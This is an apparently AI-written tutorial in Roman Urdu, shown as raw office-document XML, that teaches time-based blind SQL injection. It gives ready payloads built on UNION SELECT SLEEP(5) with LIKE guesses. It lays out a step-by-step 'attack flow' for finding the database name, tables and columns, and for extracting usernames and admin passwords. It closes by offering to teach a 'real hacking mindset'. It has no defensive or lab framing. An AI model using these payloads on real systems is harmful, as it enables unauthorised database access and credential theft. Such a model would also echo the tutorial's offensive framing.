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  <w:t>Time-Based Blind SQL Injection – Complete Explanation (Roman Urdu)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1. Time-Based SQL Injection Kya Hoti Hai?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Ye Blind SQL Injection ka ek advanced type hai.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Simple Samajh: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Na data show hota hai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Na TRUE/FALSE response milta hai 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To phir kaise pata chalega?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Sirf TIME (delay) se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Core Idea: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Agar query sahi hui → delay ayega</w:t>
        <w:br/>
        <w:t>Agar query galat hui → koi delay nahi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2. SLEEP() Function Samajh Lo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SLEEP(5)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Meaning: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Database 5 seconds ke liye ruk jata hai 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Important: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Ye tabhi run hota hai jab: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query successful ho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3. Real Working Concept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Tum query inject karte ho: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correct hai → page late load hoga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incorrect hai → page normal speed pe load hoga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4. Step 1: Columns Count Karna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Try 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0" w:name="code-block-viewer"/>
      <w:bookmarkEnd w:id="0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admin123' UNION SELECT SLEEP(5);--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Result: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delay nahi → wrong columns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Try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1" w:name="code-block-viewer_Copy_9"/>
      <w:bookmarkEnd w:id="1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admin123' UNION SELECT SLEEP(5),2;--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Result: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5 sec delay aya → correct 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Conclusion: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Table me 2 columns hain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5. Step 2: Boolean Logic + Time Combine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Ab hum Boolean jaisa process use karenge, lekin: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TRUE = delay</w:t>
        <w:br/>
        <w:t>→ FALSE = no delay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6. Database Name Guess Karna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Payload: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2" w:name="code-block-viewer_Copy_10"/>
      <w:bookmarkEnd w:id="2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admin123' UNION SELECT SLEEP(5),2 where database() like 'a%';--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Result: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Delay aya → database 'a' se start hota hai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Delay nahi → galat guess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3" w:name="code-block-viewer_Copy_11"/>
      <w:bookmarkEnd w:id="3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database() like 'u%'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→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>agar delay aya → DB 'u' se start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7. Step by Step Guessing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Same process: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First letter guess karo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Phir second letter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Phir third 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Example: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u% → TRUE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us% → TRUE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use% → TRUE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Aise full database name mil jata hai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8. Tables Find Karna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4" w:name="code-block-viewer_Copy_12"/>
      <w:bookmarkEnd w:id="4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SLEEP(5),2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FROM information_schema.tables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WHERE table_schema='your_db' </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after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and table_name like 'a%';--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Process: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a%, b%, c% try karo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jahan delay aaye → match mil gaya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9. Columns Find Karna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5" w:name="code-block-viewer_Copy_13"/>
      <w:bookmarkEnd w:id="5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SLEEP(5),2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FROM information_schema.columns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WHERE table_name='users' </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after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and column_name like 'a%';--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10. Data Extract Karna</w:t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Username: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6" w:name="code-block-viewer_Copy_14"/>
      <w:bookmarkEnd w:id="6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SLEEP(5),2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after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from users where username like 'a%';--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3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Password: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12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7" w:name="code-block-viewer_Copy_15"/>
      <w:bookmarkEnd w:id="7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admin123' UNION SELECT SLEEP(5),2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from users </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after="12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 xml:space="preserve">where username='admin' </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after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and password like '1%';--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11. Important Difference (Very Important)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="342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7"/>
        <w:gridCol w:w="1837"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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Type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Response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Boolean-Based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TRUE / FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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Time-Based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Delay / No Delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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12. Real Life Analogy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Socho tum kisi se sawal poochte ho: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wo 5 sec baad jawab de → YES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turant jawab de → NO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Tum isi delay se answer samajh rahe ho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13. Common Mistakes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Delay notice nahi karte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Internet slow ho to confuse ho jate hain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SLEEP() galat jagah lagate hain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UNION columns mismatch kar dete hain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14. Pro Tips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Hamesha stopwatch ya timing observe karo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Same query 2-3 dafa test karo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chhota delay (2 sec) bhi use kar sakte ho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15. Complete Attack Flow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Columns count (SLEEP se)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Database name guess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Tables find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Columns find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Username extract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Password extract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Heading2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 w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>16. Final Summary (Short)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Time-Based SQL Injection me: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koi output nahi hota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sirf delay se pata chalta hai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Tool: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tLeast" w:line="360" w:before="420" w:after="0"/>
        <w:ind w:hanging="0" w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="code-block-viewer_Copy_16"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SLEEP(x)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Logic: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Delay → query correct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No delay → query wrong </w:t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>Technique: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tLeast" w:line="360" w:before="420" w:after="0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LIKE + guessing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lineRule="atLeast" w:line="360" w:before="420" w:after="283"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs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step by step data extract </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs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 w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after="120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Agar tum chaho to main tumhe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>poora SQL Injection ka comparison (In-Band vs Blind vs Time-Based)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:bCs/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> ek simple chart aur real hacking mindset ke sath sikha sakta hoon.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user">
    <w:name w:val="Frame Contents (user)"/>
    <w:basedOn w:val="Normal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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>8</Pages>
  <Words>551</Words>
  <Characters>2580</Characters>
  <CharactersWithSpaces>3025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2026-04-06T22:01:37Z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